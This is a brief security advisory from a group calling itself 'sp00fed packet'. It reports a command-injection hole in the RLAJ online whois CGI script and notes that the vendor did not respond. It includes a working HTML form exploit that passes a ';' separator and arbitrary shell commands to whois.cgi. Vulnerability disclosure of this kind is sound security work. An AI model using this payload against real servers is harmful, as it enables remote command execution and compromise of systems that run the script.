Read the attached advisory. -- WBR, Zeux. Origin: Truth is not always the same as the majority decision --- Zeux<zeux@inbox.ru> from sp00fed packet Mail: zeux@inbox.ru zeux@secforum.net zeux@undergrounda.net
/----------------+--------------------------------------+-------------\ | sp00fed packet | | advisory #1 | +----------------+--------------------------------------+-------------+ | Product: RLAJ on-line whois service | | Vulnerability: command execution | | Danger: high | | Vendor: http://www.rlaj.com/ | \---------------------------------------------------------------------/ ::Description:: This whois service doesn't filter special symbols, so you can enter |<any *nix command>| into domain name field. But domain name can not contain "." symbols. There is one more method. Just use this form: <form method=post action="http://server/cgi-bin/whois/whois.cgi";> <input type=hidden name="lookup" value=";"> Cmd: <input type="text" name="ext"><input type=submit value="Go"> </form> The script is popular (385 people have downloaded it at www.cgi.ru (Russian public collection of scripts)), so the danger is high. ::Vendor:: Vendor was informed 2 days ago. No response was received. ::Contacts:: [http://www.sp00fed.ru/] sp00fed packet [zeux@inbox.ru] Zeux (it's me ;) [spikir@rbcmail.ru] Spikir (team coordinator)
